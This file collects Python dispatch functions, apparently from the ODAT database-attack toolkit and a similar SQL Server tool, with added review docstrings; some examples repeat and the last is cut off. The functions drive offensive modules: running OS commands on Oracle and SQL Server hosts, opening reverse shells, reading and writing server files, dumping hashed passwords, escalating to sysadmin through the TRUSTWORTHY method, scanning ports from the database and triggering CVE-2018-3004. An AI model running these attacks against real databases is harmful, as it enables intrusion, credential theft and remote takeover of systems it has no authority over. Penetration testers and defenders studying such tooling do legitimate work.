Example #1
def runCtxsysModule(args):
    """Dispatch the CTXSYS module options held in *args*.

    The options are validated with checkOptionsGivenByTheUser, a Ctxsys
    object is built and connected (stopIfError=True), and then the
    self-test and/or the remote file read are run as requested.

    Args:
        args: option mapping. Keys read here: "test-module", "getFile",
            "server" and "print" (the output helper object).

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    requiredOptions = ["test-module", "getFile"]
    if checkOptionsGivenByTheUser(args, requiredOptions) == False:
        return EXIT_MISS_ARGUMENT
    module = Ctxsys(args)
    module.connection(stopIfError=True)
    if args["test-module"] == True:
        # NOTE(review): the title names DBMSScheduler inside the CTXSYS
        # module; it looks copy-pasted. The string is kept as it is.
        args["print"].title("Test if the DBMSScheduler library can be used")
        module.testAll()
    # Option 1: read file
    if args["getFile"] != None:
        out = args["print"]
        remoteFile = args["getFile"]
        out.title("Read the {0} file on the {1} server".format(remoteFile, args["server"]))
        content = module.readAFile(remoteFile)
        # An Exception instance as return value is treated as the failure case.
        if isinstance(content, Exception):
            out.badNews("Impossible to read the {0} file: {1}".format(remoteFile, content))
        elif content == "":
            out.goodNews("The {0} file is empty or it doesn't exist".format(remoteFile))
        else:
            out.goodNews(
                "Data stored in the {0} file (escape char replace by '\\n'):\n{1}".format(remoteFile, content)
            )
    # NOTE(review): no close() call is made on the Ctxsys object here.
Example #2
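def runTrustworthyPEModule(args):
    """Dispatch the TrustworthyPE module options held in *args*.

    After option validation (checkAccount=True) a TrustworthyPE object is
    built and connected. Depending on the flags it then runs the self-test,
    calls tryPE(), calls cleanPE() after an interactive confirmation, or
    reports whether the current user is sysadmin.

    Args:
        args: option mapping. Keys read here: "sp-name", "test-module",
            "be-sysadmin", "drop-sysadmin", "is-sysadmin" and "print"
            (the output helper object).

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    knownOptions = ["test-module", "be-sysadmin", "drop-sysadmin", "is-sysadmin"]
    if checkOptionsGivenByTheUser(args, knownOptions, checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    trustworthyPE = TrustworthyPE(args)
    trustworthyPE.connect()
    if args["sp-name"] != "":
        trustworthyPE.spName = args["sp-name"]
    if args["test-module"] == True:
        trustworthyPE.testAll()
    if args["be-sysadmin"] == True:
        args['print'].title("Try to become sysadmin with the trustworthy database method")
        status = trustworthyPE.tryPE()
        if status == True:
            args['print'].goodNews("The current user is now sysadmin ! You should run again the all module to know what you can do...")
        else:
            args['print'].badNews("Impossible to put the sysadmin privilege to the current user with this method: {0}".format(status))
    if args["drop-sysadmin"] == True:
        args['print'].title("Try to drop sysadmin privilege to the current user")
        # Only an explicit "y" confirms; any other answer leaves the role untouched.
        continu = input("Do you want really drop sysadmin privilege of the current user (y/N) ").lower() == 'y'
        if continu == True:
            status = trustworthyPE.cleanPE()
            if status == True:
                args['print'].goodNews("Sysadmin privilege dropped for the current user")
            else:
                args['print'].badNews("Impossible to drop the sysadmin privilege for the current user: {0}".format(status))
        else:
            args['print'].badNews("Sysadmin privilege has not been modified")
    if args["is-sysadmin"] == True:
        args['print'].title("Is the current user is sysadmin?")
        isSysadmin = trustworthyPE.isCurrentUserSysadmin()
        # An Exception return value means the lookup failed. It must not
        # fall through to the "NOT sysadmin" message, which would report an
        # unknown state as a definite answer.
        if isinstance(isSysadmin, Exception):
            args['print'].badNews("Impossible to know if the current user is sysadmin: {0}".format(isSysadmin))
        elif isSysadmin == True:
            args['print'].goodNews("The current user is sysadmin")
        else:
            args['print'].goodNews("The current user is NOT sysadmin")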
Example #3
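def runSearchModule(args):
    """Dispatch the Search module options held in *args*.

    Validates the options, connects a Search object, then runs the
    self-test, a column-name pattern search and/or the built-in
    password-like column-name search, printing each result table.

    Args:
        args: option mapping. Keys read here: "test-module",
            "column-names" (optional key), "pwd-column-names",
            "show-empty-columns" and "print" (the output helper object).

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "column-names", "pwd-column-names"]) == False:
        return EXIT_MISS_ARGUMENT
    search = Search(args)
    search.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the Search module can be used")
        search.testAll()
    # dict.has_key() exists only on Python 2; the `in` test is equivalent
    # and also runs on Python 3.
    if 'column-names' in args and args['column-names'] != None:
        args['print'].title("Columns which contains the pattern '{0}'".format(args['column-names']))
        table = search.searchInColumns(args['column-names'], showEmptyColumns=args['show-empty-columns'])
        if search.isEmptyTable(table) == True:
            args['print'].badNews("no result found")
        else:
            args['print'].goodNews(table)
    if args['pwd-column-names'] == True:
        args['print'].title("Columns which contains the pattern ~password~ like (multi language)")
        table = search.searchPwdKeyworkInColumnNames(showEmptyColumns=args['show-empty-columns'])
        # This branch mixed tabs and spaces, which Python 3 rejects with a
        # TabError; the indentation is now uniform.
        if search.isEmptyTable(table) == True:
            args['print'].badNews("no result found")
        else:
            args['print'].goodNews(table)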
Example #4
def runDbmsXslprocessorModule(args):
    """Dispatch the DbmsXslprocessor module options held in *args*.

    Validates the options, connects a DbmsXslprocessor object, then runs
    the self-test and/or copies a local file to a path on the server with
    putFile(). close() is called at the end.

    Args:
        args: option mapping. Keys read here: "test-module", "putFile"
            (indexed as [0] = remote path, [1] = remote file name,
            [2] = local file), "server" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "putFile"]) == False:
        return EXIT_MISS_ARGUMENT
    module = DbmsXslprocessor(args)
    module.connection(stopIfError=True)
    if args["test-module"] == True:
        # NOTE(review): the title names DBMSAdvisor inside the
        # DbmsXslprocessor module; it looks copy-pasted. Kept as it is.
        args["print"].title("Test if the DBMSAdvisor library can be used")
        module.testAll()
    # Option 1: putLocalFile
    if args["putFile"] != None:
        out = args["print"]
        spec = args["putFile"]
        localFile, remotePath, remoteName = spec[2], spec[0], spec[1]
        out.title(
            "Put the {0} local file in the {1} path (named {2}) of the {3} server".format(
                localFile, remotePath, remoteName, args["server"]
            )
        )
        outcome = module.putFile(remotePath, remoteName, localFile=localFile)
        # Anything other than True is reported as the failure reason.
        if outcome == True:
            out.goodNews(
                "The {0} local file was put in the remote {1} path (named {2})".format(
                    localFile, remotePath, remoteName
                )
            )
        else:
            out.badNews(
                "The {0} local file was not put in the remote {1} path (named {2}): {3}".format(
                    localFile, remotePath, remoteName, str(outcome)
                )
            )
    module.close()
Example #5
def runDbmsSchedulerModule(args):
    """Dispatch the DbmsScheduler module options held in *args*.

    Validates the options, connects a DbmsScheduler object, then runs the
    self-test, an OS command through execOSCommand() and/or
    giveReverseShell(), as requested. close() is called at the end.

    Args:
        args: option mapping. Keys read here: "test-module", "exec",
            "reverse-shell" (indexed as [0] = local ip, [1] = local port),
            "server" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "exec", "reverse-shell"]) == False:
        return EXIT_MISS_ARGUMENT
    scheduler = DbmsScheduler(args)
    scheduler.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DBMSScheduler library can be used")
        scheduler.testAll()
    # Option 1: exec
    if args['exec'] != None:
        out = args['print']
        command, server = args['exec'], args['server']
        out.title("Execute the `{0}` on the {1} server".format(command, server))
        # The command string is handed over unchanged; this function adds
        # no filtering of its own.
        outcome = scheduler.execOSCommand(command)
        if outcome == True:
            out.goodNews("The `{0}` command was executed on the {1} server".format(command, server))
        else:
            out.badNews("The `{0}` command was not executed on the {1} server: {2}".format(command, server, str(outcome)))
        # Called on success and on failure alike.
        scheduler.__getJobStatus__()
    # Option 2: reverse shell
    if args['reverse-shell'] != None:
        args['print'].title("Try to give you a reverse shell from the {0} server".format(args['server']))
        listener = args['reverse-shell']
        scheduler.giveReverseShell(localip=listener[0], localport=listener[1])
    scheduler.close()
Example #6
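def runPasswordsModule(args):
    """Dispatch the Passwords module options held in *args*.

    Validates the options, connects a Passwords object, makes sure an Info
    object is stored under args['info'], then runs the self-test and/or the
    two hashed-password retrieval calls, printing what they return.

    Args:
        args: option mapping. Keys read here: "info" (optional key, set by
            this function when absent), "test-module", "get-passwords",
            "get-passwords-from-history" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "info", "get-passwords", "get-passwords-from-history"]) == False:
        return EXIT_MISS_ARGUMENT
    passwords = Passwords(args)
    passwords.connection(stopIfError=True)
    # dict.has_key() exists only on Python 2; `not in` is equivalent and
    # also runs on Python 3.
    if 'info' not in args:
        info = Info(args)
        info.loadInformationRemoteDatabase()
        args['info'] = info
    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        passwords.testAll()
    if args['get-passwords'] == True:
        args['print'].title("Try to get Oracle hashed passwords")
        status = passwords.__tryToGetHashedPasswords__()
        # Anything other than True is printed as the failure reason.
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            # NOTE(review): the hashes go to the console via printPasswords().
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-from-history'] == True:
        args['print'].title("Try to get Oracle hashed passwords from history")
        status = passwords.__tryToGetHashedPasswordsfromHistory__()
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))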
Example #7
def runDbmsSchedulerModule(args):
    """Run the DbmsScheduler module according to the options in *args*.

    Steps: option validation, DbmsScheduler connection, optional
    self-test, optional OS command via execOSCommand(), optional
    giveReverseShell(), then close().

    Args:
        args: option mapping. Keys read here: "test-module", "exec",
            "reverse-shell" (indexed as [0] = local ip, [1] = local port),
            "server" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    acceptedOptions = ["test-module", "exec", "reverse-shell"]
    if checkOptionsGivenByTheUser(args, acceptedOptions) == False:
        return EXIT_MISS_ARGUMENT
    dbmsScheduler = DbmsScheduler(args)
    dbmsScheduler.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DBMSScheduler library can be used")
        dbmsScheduler.testAll()
    # Option 1: exec
    if args['exec'] != None:
        printer = args['print']
        osCommand = args['exec']
        host = args['server']
        printer.title("Execute the `{0}` on the {1} server".format(osCommand, host))
        result = dbmsScheduler.execOSCommand(osCommand)
        if result == True:
            printer.goodNews("The `{0}` command was executed on the {1} server".format(osCommand, host))
        else:
            # A non-True result is shown as the failure reason.
            printer.badNews("The `{0}` command was not executed on the {1} server: {2}".format(osCommand, host, str(result)))
        # Runs whether the command succeeded or not.
        dbmsScheduler.__getJobStatus__()
    # Option 2: reverse shell
    if args['reverse-shell'] != None:
        args['print'].title("Try to give you a reverse shell from the {0} server".format(args['server']))
        endpoint = args['reverse-shell']
        dbmsScheduler.giveReverseShell(localip=endpoint[0], localport=endpoint[1])
    dbmsScheduler.close()
Example #8
def runUnwrapperModule(args):
    """Dispatch the unwrapper module options held in *args*.

    At least one of "test-module", "object-name" or "file" has to be set.
    An offline Unwrapper is built for "file", an online one (with
    connection) for "object-name"; the self-test and the remote and/or
    local unwrap are then run and their output printed.

    Args:
        args: option mapping. Keys read here: "test-module",
            "object-name", "file" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when no option was chosen or option validation
        fails, otherwise None.
    """
    def _report(code, failureMessage):
        # None is the only value treated as "no source code obtained".
        if code == None:
            args['print'].badNews(failureMessage)
        else:
            args['print'].goodNews(code)

    if args['test-module'] == False and args['object-name'] == None and args['file'] == None:
        logging.critical("You must choose --test-module or/and --object-name or/and --file")
        return EXIT_MISS_ARGUMENT
    if args['file'] != None:
        unwrapper = Unwrapper(args, offline=True)
    if args['object-name'] != None:
        if checkOptionsGivenByTheUser(args, ["test-module", "object-name"]) == False:
            return EXIT_MISS_ARGUMENT
        # NOTE(review): when "file" is set as well, this replaces the
        # offline instance, so the local unwrap below runs on the online one.
        unwrapper = Unwrapper(args, offline=False)
        unwrapper.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the Unwrapper module can be used")
        # NOTE(review): with only "test-module" set, no Unwrapper has been
        # created above and this line raises UnboundLocalError.
        unwrapper.testAll()
    if args['object-name'] != None:
        args['print'].title("Unwrapping PL/SQL source code of {0} stored in the remote database".format(args['object-name']))
        _report(
            unwrapper.unwrapRemotely(args['object-name']),
            "Impossible to get the source code or to unwrap it. Is it wrapped? Have you permissions?...",
        )
    if args['file'] != None:
        args['print'].title("Unwrapping PL/SQL source code stored in the local file named {0}".format(args['file']))
        _report(
            unwrapper.unwrapLocally(args['file']),
            "Impossible to read the source code or to unwrap it. Is it wrapped? Have you permissions?...",
        )
Example #9
def runJobsModule(args):
    """Dispatch the Jobs module options held in *args*.

    After option validation (checkAccount=True) a Jobs object is built and
    connected. It then runs the self-test, creates and executes a job
    carrying a system command, calls getInteractiveReverseShell() and/or
    prints the list of agent jobs, as requested.

    Args:
        args: option mapping. Keys read here: "sleep-status", "sp-name",
            "test-module", "exec", "type", "reverse-shell" (indexed [0]
            and [1]), "print-jobs" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    acceptedOptions = ["test-module", "exec", "reverse-shell", "print-jobs"]
    if checkOptionsGivenByTheUser(args, acceptedOptions, checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    jobs = Jobs(args)
    jobs.connect()
    # Empty strings mean "keep the value the Jobs object already has".
    if args["sleep-status"] != "":
        jobs.sleepStatus = args["sleep-status"]
    if args["sp-name"] != "":
        jobs.spName = args["sp-name"]
    if args["test-module"] == True:
        jobs.testAll()
    if args["exec"] != None:
        out = args['print']
        out.title("Try to execute the system command with SQL Server Agent Stored Procedures (Jobs)")
        # "CMDEXEC" is the fallback when no type was given.
        cmdType = args["type"] if args["type"] != "" else "CMDEXEC"
        # "descritpion" is the keyword name used at this call site; it is
        # kept as written.
        created = jobs.createAndExecuteJob(cmd=args["exec"], descritpion="MDAT", cmdType=cmdType, serverName="(LOCAL)")
        if created == True:
            jobState = jobs.getJobStatus()
            # True, False and None each get their own message; any other
            # value is printed as the failure reason.
            if jobState == True:
                out.goodNews("The job to execute the system command has been created and executed")
            elif jobState == False:
                out.badNews("The job to execute the system command has not been executed because there is probably a mistake in your command")
            elif jobState == None:
                out.unknownNews("The job status is unknown because it is still running")
            else:
                out.badNews("The system command has NOT been executed on the database server: {0}".format(jobState))
        else:
            out.badNews("Impossible to create a job and to execute it: {0}".format(created))
    if args["reverse-shell"] != None:
        args['print'].title("Try to give you a reverse shell with SQL Server Agent Stored Procedures (Jobs)")
        # The return value is not inspected.
        jobs.getInteractiveReverseShell(args['reverse-shell'][0], args['reverse-shell'][1])
    if args["print-jobs"] != None:
        args['print'].title("Print list of agent jobs")
        jobs.printJobs()
Example #10
def runOradbgModule(args):
    """Dispatch the Oradbg module options held in *args*.

    Validates the options, connects an Oradbg object, then runs the
    self-test and/or an OS command through execOSCommand(). close() is
    called at the end.

    Args:
        args: option mapping. Keys read here: "test-module", "exec",
            "server" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    module = Oradbg(args)
    module.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the Oradbg can be used")
        module.testAll()
    # Option 1: exec
    if args['exec'] != None:
        out = args['print']
        command, server = args['exec'], args['server']
        out.title("Execute the `{0}` on the {1} server".format(command, server))
        outcome = module.execOSCommand(command)
        if outcome == True:
            # The message itself says "(probably)": success is not confirmed here.
            out.goodNews("The `{0}` command was executed on the {1} server (probably)".format(command, server))
        else:
            out.badNews("The `{0}` command was not executed on the {1} server: {2}".format(command, server, str(outcome)))
    module.close()
Example #11
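def runPasswordsModule(args):
    """Dispatch the Passwords module options held in *args*.

    Validates the options, connects a Passwords object, makes sure an Info
    object is stored under args['info'], then runs the self-test and/or the
    two hashed-password retrieval calls, printing what they return.

    Args:
        args: option mapping. Keys read here: "info" (optional key, set by
            this function when absent), "test-module", "get-passwords",
            "get-passwords-from-history" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "get-passwords", "get-passwords-from-history"]) == False:
        return EXIT_MISS_ARGUMENT
    passwords = Passwords(args)
    passwords.connection(stopIfError=True)
    # dict.has_key() exists only on Python 2; `not in` is equivalent and
    # also runs on Python 3.
    if 'info' not in args:
        info = Info(args)
        info.loadInformationRemoteDatabase()
        args['info'] = info
    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        passwords.testAll()
    if args['get-passwords'] == True:
        args['print'].title("Try to get Oracle hashed passwords")
        status = passwords.__tryToGetHashedPasswords__()
        # Anything other than True is printed as the failure reason.
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            # NOTE(review): the hashes go to the console via printPasswords().
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-from-history'] == True:
        args['print'].title("Try to get Oracle hashed passwords from history")
        status = passwords.__tryToGetHashedPasswordsfromHistory__()
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))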
Example #12
def runHttpUriTypeModule(args):
    """Dispatch the HTTPURITYPE module options held in *args*.

    Validates the options, connects an HttpUriType object, then runs the
    self-test, a GET request through sendGetRequest() and/or a TCP port
    scan through scanTcpPorts(), as requested. close() is called at the
    end.

    Args:
        args: option mapping. Keys read here: "test-module", "httpUrl",
            "connectionStr", "outputFile", "scan-ports" (indexed as
            [0] = ip, [1] = port list) and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "httpUrl", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    client = HttpUriType(args)
    client.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the HTTPURITYPE library can be used")
        client.testAll()
    # Option 1: httpUrl
    if args['httpUrl'] != None:
        args['print'].title("Send a GET request from {0} to {1}".format(args['connectionStr'], args['httpUrl']))
        reply = client.sendGetRequest(url=args['httpUrl'])
        if isinstance(reply, Exception):
            # The exception text is not shown to the operator.
            args['print'].badNews("HTTP GET request failed")
        else:
            args['print'].goodNews("The server response is:\n {0}".format(reply))
            if args['outputFile'] != None:
                client.writeFile(args['outputFile'], str(reply))
    # Option 2: scan-ports
    if args['scan-ports'] != None:
        portSpec = args['scan-ports'][1]
        if "," in portSpec:
            ports = portSpec.split(',')
        elif '-' in portSpec:
            bounds = portSpec.split('-')
            # NOTE(review): range() leaves out the upper bound, so the last
            # port written in "a-b" is not part of the list.
            ports = [str(number) for number in range(int(bounds[0]), int(bounds[1]))]
        else:
            # NOTE(review): only logged; the scan call below still runs,
            # with an empty port list.
            ports = []
            logging.error("Syntax for ports given not recognized (ex: 123-2452 or 143,134,4783)")
        args['print'].title("Scan ports ({0}) of {1} ".format(args['scan-ports'][1], args['scan-ports'][0]))
        scanResults = client.scanTcpPorts(httpObject=client, ip=args['scan-ports'][0], ports=ports)
        client.printScanPortResults(scanResults)
    client.close()
Example #13
def runjavaModule(args):
    """Dispatch the JAVA module options held in *args*.

    Validates the options, connects a Java object, then runs the
    self-test, an OS command, the interactive pseudo shell, the reverse
    shell and/or the CVE-2018-3004 file creation, as requested. close() is
    called at the end.

    Args:
        args: option mapping. Keys read here: "test-module", "exec",
            "shell", "reverse-shell" (indexed as [0] = local ip,
            [1] = local port), "create-file-CVE-2018-3004" (indexed as
            [0] = data, [1] = remote file name), "server" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    acceptedOptions = ["test-module", "shell", "reverse-shell", "exec", "create-file-CVE-2018-3004"]
    if checkOptionsGivenByTheUser(args, acceptedOptions) == False:
        return EXIT_MISS_ARGUMENT
    java = Java(args)
    java.connection(stopIfError=True)
    if args['test-module'] == True:
        # NOTE(review): the title names DBMSScheduler inside the JAVA
        # module; it looks copy-pasted. Kept as it is.
        args['print'].title("Test if the DBMSScheduler library can be used")
        java.testAll()
    # Option 1: exec
    if args['exec'] != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'], args['server']))
        # The result is not inspected here; printResponse=True is passed
        # to the callee.
        java.execOSCommand(
            cmd=args['exec'],
            printResponse=True,
            needCreateClassAndFunction=True,
            needDeleteClassAndFunction=True,
        )
    # Option 2: shell
    if args['shell'] == True:
        args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
        java.getInteractiveShell()
    # Option 3: reverse shell
    if args['reverse-shell'] != None:
        args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
        listener = args['reverse-shell']
        java.giveReverseShell(localip=listener[0], localport=listener[1])
    # Option 4: Bypass built in Oracle JVM security through Deserialization (CVE-2018-3004)
    if args['create-file-CVE-2018-3004'] != None:
        out = args['print']
        spec = args['create-file-CVE-2018-3004']
        out.title("Try to create the file {0} on {1}".format(spec[1], args['server']))
        outcome = java.createOrAppendFileViaCVE_2018_3004(data=spec[0], remoteFilename=spec[1])
        if isinstance(outcome, Exception):
            out.badNews("Impossible to create the file {0}: {1}".format(spec[1], outcome))
        elif outcome == True:
            out.goodNews("The file {0} has been created on the target with data '{1}'".format(spec[1], spec[0]))
        # NOTE(review): any other return value produces no message at all.
    java.close()
Example #14
def runTnsCmdModule(args):
    """Dispatch the TNS cmd module options held in *args*.

    Validates the options with checkAccount=False, builds a Tnscmd object
    and, depending on the flags, prints the aliases, the version and/or
    the status data returned by the listener.

    Args:
        args: option mapping. Keys read here: "ping", "version", "status",
            "server", "port" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    # NOTE(review): validation runs with checkAccount=False and no
    # connection() call is made here, so these queries presumably need no
    # database account; confirm in Tnscmd.
    if checkOptionsGivenByTheUser(args, ["version", "status", "ping"], checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    # An older hand-written check for --ping/--version/--status was
    # commented out at this point in favour of the call above.
    tnscmd = Tnscmd(args)
    if args['ping'] == True:
        out = args['print']
        out.title("Searching ALIAS on the {0} server, port {1}".format(args['server'], args['port']))
        aliases = tnscmd.getAlias()
        out.goodNews(
            "{0} ALIAS received: {1}. You should use this alias (more or less) as Oracle SID.".format(len(aliases), aliases)
        )
    if args['version'] == True:
        out = args['print']
        out.title(
            "Searching the version of the Oracle database server ({0}) listening on the port {1}".format(args['server'], args['port'])
        )
        remoteVersion = tnscmd.getVersion()
        out.goodNews("The remote database version is: '{0}'".format(remoteVersion))
    if args['status'] == True:
        out = args['print']
        out.title(
            "Searching the server status of the Oracle database server ({0}) listening on the port {1}".format(args['server'], args['port'])
        )
        tnscmd.getInformation(cmd='status')
        # The reply is fetched separately from the request call above.
        out.goodNews("Data received by the database server: '{0}'".format(tnscmd.getRecvData()))
Example #15
File: UtlTcp.py Project: 6zq/odat
def runUtlTcpModule(args):
    """Dispatch the UTL_TCP module options held in *args*.

    Validates the options, connects a UtlTcp object, then runs the
    self-test, sends the packet stored in a file through sendPacket()
    and/or scans TCP ports through scanTcpPorts(). close() is called at
    the end.

    Args:
        args: option mapping. Keys read here: "test-module",
            "send-packet" (indexed [0], [1] and [2] = file name),
            "scan-ports" (indexed as [0] = ip, [1] = port list) and
            "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "send-packet", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    utlTcp = UtlTcp(args)
    utlTcp.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the UTL_TCP library can be used")
        utlTcp.testAll()
    # Option 2: send packet
    if args['send-packet'] != None:
        args['print'].title("Send the packet stored in the {0} file".format(args['send-packet'][2]))
        packet = args['send-packet']
        answer = utlTcp.sendPacket(packet[0], packet[1], filename=packet[2])
        # An Exception instance as return value is treated as the failure case.
        if isinstance(answer, Exception):
            args['print'].badNews("Impossible to send the packet: {0}".format(answer))
        else:
            args['print'].goodNews("Response from the server:\n{0}".format(answer))
    # Option 1: tcp Scan
    if args['scan-ports'] != None:
        portSpec = args['scan-ports'][1]
        if "," in portSpec:
            ports = portSpec.split(',')
        elif '-' in portSpec:
            bounds = portSpec.split('-')
            # NOTE(review): range() leaves out the upper bound, so the last
            # port written in "a-b" is not part of the list.
            ports = [str(number) for number in range(int(bounds[0]), int(bounds[1]))]
        else:
            # NOTE(review): only logged; the scan call below still runs,
            # with an empty port list.
            ports = []
            logging.error("Syntax for ports given not recognized")
        args['print'].title("Scan ports ({0}) of {1} ".format(args['scan-ports'][1], args['scan-ports'][0]))
        scanResults = utlTcp.scanTcpPorts(httpObject=utlTcp, ip=args['scan-ports'][0], ports=ports)
        utlTcp.printScanPortResults(scanResults)
    utlTcp.close()
Example #16
def runjavaModule(args):
    """Dispatch the JAVA module options held in *args*.

    Validates the options, connects a Java object, then runs the
    self-test, an OS command, the interactive pseudo shell and/or the
    reverse shell, as requested. close() is called at the end.

    Args:
        args: option mapping. Keys read here: "test-module", "exec",
            "shell", "reverse-shell" (indexed as [0] = local ip,
            [1] = local port), "server" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    acceptedOptions = ["test-module", "shell", "reverse-shell", "exec"]
    if checkOptionsGivenByTheUser(args, acceptedOptions) == False:
        return EXIT_MISS_ARGUMENT
    java = Java(args)
    java.connection(stopIfError=True)
    if args['test-module'] == True:
        # NOTE(review): the title names DBMSScheduler inside the JAVA
        # module; it looks copy-pasted. Kept as it is.
        args['print'].title("Test if the DBMSScheduler library can be used")
        java.testAll()
    # Option 1: exec
    if args['exec'] != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'], args['server']))
        # The result is not inspected here; printResponse=True is passed
        # to the callee.
        java.execOSCommand(
            cmd=args['exec'],
            printResponse=True,
            needCreateClassAndFunction=True,
            needDeleteClassAndFunction=True,
        )
    # Option 2: shell
    if args['shell'] == True:
        args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
        java.getInteractiveShell()
    # Option 3: reverse shell
    if args['reverse-shell'] != None:
        args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
        listener = args['reverse-shell']
        java.giveReverseShell(localip=listener[0], localport=listener[1])
    java.close()
Example #17
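def runDbmsLob(args):
    """Dispatch the DbmsLob module options held in *args*.

    Validates the options, connects a DbmsLob object, then runs the
    self-test and/or reads a remote file with getFile(), which is also
    given a local file name, and prints the outcome.

    Args:
        args: option mapping. Keys read here: "test-module", "getFile"
            (indexed as [0] = remote path, [1] = remote file name,
            [2] = local file) and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False:
        return EXIT_MISS_ARGUMENT
    dbmsLob = DbmsLob(args)
    dbmsLob.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DbmsLob module can be used")
        dbmsLob.testAll()
    # Option 1: getFile
    if args['getFile'] != None:
        remotePath = args['getFile'][0]
        remoteName = args['getFile'][1]
        localFile = args['getFile'][2]
        args['print'].title("Read the {0} file stored in the {1} path".format(remoteName, remotePath))
        data = dbmsLob.getFile(remotePath=remotePath,
                               remoteNameFile=remoteName,
                               localFile=localFile)
        # Exception -> error, False -> missing file, '' -> empty file,
        # anything else is the file content.
        if isinstance(data, Exception):
            args['print'].badNews("There is an error: {0}".format(data))
        elif data == False:
            args['print'].badNews("The {0} file in {1} doesn't exist".format(remoteName, remotePath))
        elif data == '':
            # Format the remote file name, not the whole args['getFile'] list.
            args['print'].badNews("The {0} file is empty".format(remoteName))
        else:
            args['print'].goodNews(
                "Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}"
                .format(remoteName, remotePath, localFile, data))
    # NOTE(review): no close() call is made on the DbmsLob object here.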
Example #18
def runPasswordStealerModule(args):
    """Dispatch the Passwordstealer module options held in *args*.

    After option validation (checkAccount=True) a Passwordstealer object
    is connected, the optional self-test is run, stealHashedPasswords() is
    called and the connection is closed before the result is reported.

    Args:
        args: option mapping. Keys read here: "test-module", "host",
            "port", "database", "save-to-file" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["dump"], checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    passwordstealer = Passwordstealer(args)
    passwordstealer.connect()
    if args["test-module"] == True:
        passwordstealer.testAll()
    args['print'].title("It is stealing hashed passwords from sql_logins table or sysxlogins table")
    outcome = passwordstealer.stealHashedPasswords()
    passwordstealer.closeConnection()
    if outcome != True:
        args['print'].badNews("impossible to steal hashed passwords from sql_logins table or sysxlogins table")
        return None
    if passwordstealer.credentialsAreEmpty() == True:
        args['print'].badNews("No found hashed passwords on {0}:{1}/{2}".format(args['host'], args['port'], args['database']))
    else:
        args['print'].goodNews("Accounts found on {0}:{1}/{2}:".format(args['host'], args['port'], args['database']))
        # NOTE(review): the hashes go to the console via printPasswords().
        passwordstealer.printPasswords()
    # NOTE(review): this message is printed even when no credentials were
    # found; the file write itself does not happen in this function.
    if args['save-to-file']:
        args['print'].goodNews("Credentials have been saved in the file {0}".format(args['save-to-file']))
Example #19
def runCtxsysModule(args):
    """Run the CTXSYS module according to the options in *args*.

    Steps: option validation, Ctxsys connection (stopIfError=True),
